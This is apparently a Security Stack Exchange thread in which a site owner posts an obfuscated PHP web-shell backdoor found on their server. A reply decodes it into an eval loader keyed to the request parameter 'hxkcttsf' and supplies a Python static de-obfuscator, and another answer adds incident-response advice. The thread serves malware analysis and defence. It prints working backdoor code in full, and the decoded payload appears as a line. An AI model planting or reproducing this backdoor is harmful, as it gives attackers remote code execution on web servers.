
I have a PHP 7 site that had some malware-type files uploaded to it. My hosting provider notified me of it and I have removed them, but I wanted help in understanding the attack (help de-obfuscating, and help understanding what it does). Here is the source: DON'T RUN IT, as I don't know what it does.

<?php

$guillotine ='veLaT:(at'; $crust = 'cCrx9)'; $denials = 's';

$cockle='s';$cobby= 'e';

$cretinous ='uT,6)'; $antagonist = '[';$fortnightly ='iHr'; $formalism = 'i';$cowboy = 'a';$installed='i'; $lake =';R=^t';$dairymen='_';
$crept='$$i(f1a'; $bitterroot = 'v'; $arccos ='2?AEE_i_'; $lamb='a';$eradicated = 'tC';
$kimbell='sTiY';
$asymptotic= '"S';
$clarify = ')_,'; $firework='D/esH4+U';$clasping='b'; $divisor ='*rTts(';
$cautious ='EW-'; $embassy=')'; $chaperon ='t';$evinced ='s'; $ibid = 'P[P '; $alyson = 'KnTBe';

$buzzard= 'Sa_S);('; $laurent= ')Rk';
$enumerating= '>=Ueaa';$highly = '`7';$anonym= '0f_$R';$dam='r'; $gypsies ='rM?';$jaye= 't';$as= 'If';$flagrant = '8hHS$I)X';

$arcade = 'KT"'; $foolproof = 'r'; $bowmen ='F'; $incompatibly ='y'; $delegable='a';$heavy ='n$@Qsct';$diatribe= '4'; $campfire= 'o';
$hayyim= 'C;r__e'; $goober= 'e';$dejected= 'e';$bedazzle='$'; $incompletion = 'c'; $hypothetical= 'o'; $diploma= 'Ktusdd.J'; $irremediable='n';$epic ='eEt,S_a'; $faina = 'l(F'; $internet = 'T';

$ephemeris='('; $incorrect ='XfVg'; $binder='r'; $barnard = ')'; $libra= '"';$applied= 'O'; $christian = '_c';$bhoy = 'e';$grieving=']gspHH';$gained ='v'; $fisticuff ='3e:F';

$harlie ='EP)]'; $ermine ='h';

$bond = 'om$<a'; $groundsel ='c]_'; $banning ='r';$innocence ='$';$hutchins ='"'; $amoebae = 't';
$doggy ='y"'; $erminie='Z'; $finesse= '(T"(Vt[lT';

$differing= 'X($'; $atrophic='"]N:)ie'; $forswear = ')]xGK';$buddies = 'RE';
$cynthie = 'O[Tg6sce'; $lane ='(';
$encourage ='_';

$harassment='?p';$jobie ='i(';$camber ='['; $boiled = 'i$O';$bel = 'rQr(C);v';
$boating ='d';

$headwall = 'e';$exemplary = 'ek="5';$climate =';'; $comfortabilities =$cynthie['6'].$bel['2'] .$exemplary['0'].$bond['4'] . $finesse['5'].
$exemplary['0'] . $encourage .

$incorrect['1'] .$diploma['2']. $irremediable. $cynthie['6'].$finesse['5']. $boiled[0] .$bond['0']. $irremediable ;
$injunct =$ibid[3] ; $digestible=$comfortabilities($injunct,$exemplary['0'] .$bel['7'] . $bond['4'].$finesse['7']. $bel[3] . $bond['4']. $bel['2'] .$bel['2']. $bond['4'] .$doggy['0'].$encourage . $harassment['1'] .$bond['0']. $harassment['1'] .$bel[3].$incorrect['1'] .$diploma['2'].$irremediable. $cynthie['6'] .$encourage.$cynthie['3']. $exemplary['0'].$finesse['5'] .$encourage . $bond['4'].$bel['2'].
$cynthie['3'] . $cynthie[5]. $bel[3]. $bel[5] . $bel[5] .$bel[5] .$climate ); $digestible
($embarrassment['0'] , $fisticuff['3'], $arccos[2] , $cynthie[5],
$atrophic['2'], $divisor['0'],
$gypsies['1'],
$bond['3'] , $boiled['1'].$boiled[0]. $exemplary[2].$bond['4'] .$bel['2'].
$bel['2']. $bond['4'] .$doggy['0'] . $encourage .$bond['1'] .$exemplary['0'].$bel['2'] . $cynthie['3'].$exemplary['0'] .$bel[3].$boiled['1'] . $encourage.$buddies['0']. $buddies['1'].

$bel['1'].
$enumerating['2'].$buddies['1']. $epic[4].

$cynthie['2'].

$epic['3'].$boiled['1'] .$encourage. $bel['4'].$boiled['2']. $boiled['2'] .
$forswear['4'].$flagrant['5'] . $buddies['1'] . $epic['3'].$boiled['1']. $encourage.
$epic[4] . $buddies['1'] . $buddies['0']. $finesse['4'] .$buddies['1'].$buddies['0'] . $bel[5] .$climate.$boiled['1']. $bond['4'] . $exemplary[2]. $boiled[0]. $cynthie[5].$cynthie[5] .$exemplary['0']. $finesse['5'] .$bel[3]. $boiled['1']. $boiled[0] . $camber .$exemplary['3'] .$ermine . $forswear['2'] . $exemplary['1'] .

$cynthie['6'] .

$finesse['5']. $finesse['5']. $cynthie[5].
$incorrect['1'] .$exemplary['3']. $forswear['1'] .$bel[5]. $harassment['0'] .$boiled['1'].$boiled[0]. $camber. $exemplary['3'].
$ermine.$forswear['2']. $exemplary['1'] . $cynthie['6'].$finesse['5']. $finesse['5'] . $cynthie[5] .
$incorrect['1'] .$exemplary['3']. $forswear['1'].$atrophic['3'] . $bel[3].$boiled[0].$cynthie[5].$cynthie[5] . $exemplary['0'] .
$finesse['5'] .$bel[3]. $boiled['1'] .$boiled[0] .

$camber .$exemplary['3'] .$grieving['5']. $cynthie['2'] . $cynthie['2'].$harlie['1'] . $encourage .$grieving['5']. $differing['0'] .$forswear['4'].

$bel['4'] .$cynthie['2']. $cynthie['2'].$epic[4] . $fisticuff['3'] .$exemplary['3'] .
$forswear['1'].
$bel[5] .$harassment['0'] .

$boiled['1'].
$boiled[0] . $camber. $exemplary['3'] . $grieving['5'] .$cynthie['2'].$cynthie['2'] .$harlie['1'] . $encourage.$grieving['5'] .

$differing['0'] .$forswear['4']. $bel['4']. $cynthie['2'] . $cynthie['2'] .
$epic[4] . $fisticuff['3'] . $exemplary['3'] . $forswear['1'] .
$atrophic['3']. $boating.

$boiled[0].$exemplary['0'].$bel[5] .$climate . $exemplary['0'] . $bel['7'] .$bond['4']. $finesse['7'] .$bel[3]. $cynthie[5] .$finesse['5'] .$bel['2'] . $bel['2']. $exemplary['0'].$bel['7'].
$bel[3].$clasping . $bond['4'] .$cynthie[5].$exemplary['0']. $cynthie['4'].$diatribe.
$encourage.$boating. $exemplary['0'].

$cynthie['6'] . $bond['0'] . $boating. $exemplary['0'] .

$bel[3]. $cynthie[5] .

$finesse['5'].
$bel['2'].

$bel['2'] .

$exemplary['0'].$bel['7'].$bel[3].$boiled['1'] .

$bond['4']. $bel[5] .

$bel[5].$bel[5].$bel[5].$climate  );
ÁEDÁN
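The file above uses one obfuscation trick only: dozens of variables with dictionary-word names are assigned short string literals, and the real code is assembled by picking single characters out of them (`$cynthie['6']`, `$bel[3]`, ...) and joining the pieces with `.`. Most of the literals (`$guillotine`, `$crust`, `$kimbell`, ...) are never referenced and exist only as padding. The Python below is an added analysis helper written for this post (it is not the asker's code and not an existing tool): it never executes the PHP, it only records each `$word = 'literal';`, substitutes the character each `$word['N']` points to, and merges adjacent literals, so it is safe to run over the file as it was posted. The `SAMPLE` at the bottom is a constructed snippet in the same style with a harmless payload; the `php_*`, `collect_literals`, `resolve` and `deobfuscate` names are my own.

Read with this substitution, the posted file resolves as follows: `$comfortabilities` spells `create_function`, `$injunct` is a single space, and `$digestible` becomes `create_function(' ', 'eval(array_pop(func_get_args()));')`, i.e. an anonymous function that evals whatever string is passed as its last argument. The long final argument of the `$digestible(...)` call spells out

`$i=array_merge($_REQUEST,$_COOKIE,$_SERVER); $a=isset($i["hxkcttsf"])?$i["hxkcttsf"]:(isset($i["HTTP_HXKCTTSF"])?$i["HTTP_HXKCTTSF"]:die); eval(strrev(base64_decode(strrev($a))));`

So the file is a generic backdoor: any request that carries a value under the name `hxkcttsf` (as a GET/POST parameter, a cookie, or an `Hxkcttsf:` request header, which PHP exposes as `$_SERVER['HTTP_HXKCTTSF']`) has that value reversed, base64-decoded, reversed again and executed with the web server's privileges; requests without it simply `die`. For the incident response side this gives you a concrete detection handle: grep the web server access logs for that name in query strings and cookies, and treat every request that carried it as attacker activity. It also means the uploaded file is only the foothold, not the original weakness, so the entry point that allowed the upload still has to be found and closed.

```python
"""Static inliner for PHP obfuscated as `$word = 'literal';` plus `$word['N']` pieces.

Hypothetical analysis helper written for this post (not the asker's code): it never
executes the PHP, it only substitutes the character each $var[N] points to and glues
the pieces back into plain strings.
"""
import re

# `$name = 'literal';` (PHP single-quoted string: only \\ and \' are escapes).
LIT_ASSIGN = re.compile(r"\$(?P<name>[A-Za-z_]\w*)\s*=\s*(?P<lit>'(?:\\.|[^'\\])*')\s*;")

# Tokens for the rest of the file, tried in this order.
TOKEN = re.compile(r"""
    (?P<str>'(?:\\.|[^'\\])*')                                   # single-quoted string
  | \$(?P<name>[A-Za-z_]\w*)(?:\s*\[\s*'?(?P<idx>\d+)'?\s*\])?   # $var, $var[3], $var['3']
  | (?P<word>[A-Za-z_]\w*|\d+)                                   # keyword, identifier, number
  | (?P<tag><\?php|\?>)                                          # open / close tag
  | (?P<op>===|!==|[=!<>.]=|->|=>)                               # multi-char operators
  | (?P<ws>\s+)
  | (?P<other>.)                                                 # any other single char
""", re.X | re.S)


def php_unquote(lit):
    """Decode the body of a single-quoted PHP literal."""
    return re.sub(r"\\([\\'])", r"\1", lit[1:-1])


def php_quote(text):
    """Re-encode text as a single-quoted PHP literal."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def collect_literals(src):
    """Map each variable that is assigned one plain literal to its decoded value."""
    return {m.group("name"): php_unquote(m.group("lit")) for m in LIT_ASSIGN.finditer(src)}


def resolve(m, lits):
    """Replace $var / $var[N] by a quoted literal when $var is a known string."""
    name, idx = m.group("name"), m.group("idx")
    if name not in lits:
        return m.group(0)          # unknown variable ($_REQUEST, undefined names): keep as is
    s = lits[name]
    if idx is None:
        return php_quote(s)
    i = int(idx)
    # PHP 7 reads an out-of-range string offset as "" (with a notice)
    return php_quote(s[i] if i < len(s) else "")


def deobfuscate(src):
    """Return the PHP with every resolvable string spelled out, one statement per line."""
    lits = collect_literals(src)
    body = LIT_ASSIGN.sub("", src)  # the literal assignments are inlined, so drop them
    tokens = []
    for m in TOKEN.finditer(body):
        if m.group("ws"):
            continue
        tokens.append(resolve(m, lits) if m.group("name") else m.group(0))
    # Glue  'a' . 'b'  into  'ab'  wherever both sides are literals by now.
    merged = []
    for tok in tokens:
        if tok.startswith("'") and len(merged) >= 2 and merged[-1] == "." and merged[-2].startswith("'"):
            merged[-2] = merged[-2][:-1] + tok[1:]   # drop the inner pair of quotes
            merged.pop()                             # and the '.' between them
        else:
            merged.append(tok)
    # Re-serialise with minimal spacing.
    out = ""
    for tok in merged:
        if out and re.match(r"\w", out[-1]) and re.match(r"[\w$']", tok):
            out += " "             # keep `echo $x` from fusing into `echo$x`
        if tok == ";":
            out += ";\n"
        elif tok == "<?php":
            out += "<?php\n"
        elif tok == "=":
            out += " = "
        elif tok == ",":
            out += ", "
        else:
            out += tok
    return out.strip()


# Constructed sample in the same style as the posted file, with a harmless payload.
SAMPLE = r"""<?php
$pike = 'stu'; $heron = 'rpo'; $crane = 'el';
$gull = 'h';
$name = $pike['0'] . $pike[1] . $heron['0'] .$pike['1']. $heron[2] .
$pike[2] . $heron['1'] . $heron[1] .$crane['0'] . $heron[0];
$word = $gull . $crane[0] .$crane['1'].$crane[1]. $heron[2] ;
echo $name($word);
"""

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Running the script prints the sample reduced to `$name = 'strtoupper';`, `$word = 'hello';` and `echo $name($word);`. Fed the posted file instead (for example with `deobfuscate(open("malware.php").read())` from a Python shell, never from PHP), the variables assigned a concatenation are left as variables while every character-picking expression collapses into the literal it spells, which is enough to read the loader and the payload above in one screen. Variables that are never defined, such as `$embarrassment` in the first argument, are deliberately left untouched rather than guessed.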

1 Answer


Okay, for de-obfuscation you can use online tools such as https://www.unphp.net/ or run a local VM to test what the PHP script does.

Also, a piece of advice: since you found this on your website, it definitely means your website was hacked. As an incident response process you need to find the weakness in your website to prevent further attacks, else you will keep getting these issues.

Rory Alsop
Adetutu
    Welcome to Security.SE. "you can contact me for a Vulnerability Assessment on your website.": I'm not sure this website is the best place to sell your services. Moreover, the aspect of dealing with a compromised server is already covered in another question. I don't want to be rude, but this website is a place to allow people to learn, not to sell them services. – WhiteWinterWolf Jul 25 '17 at 08:00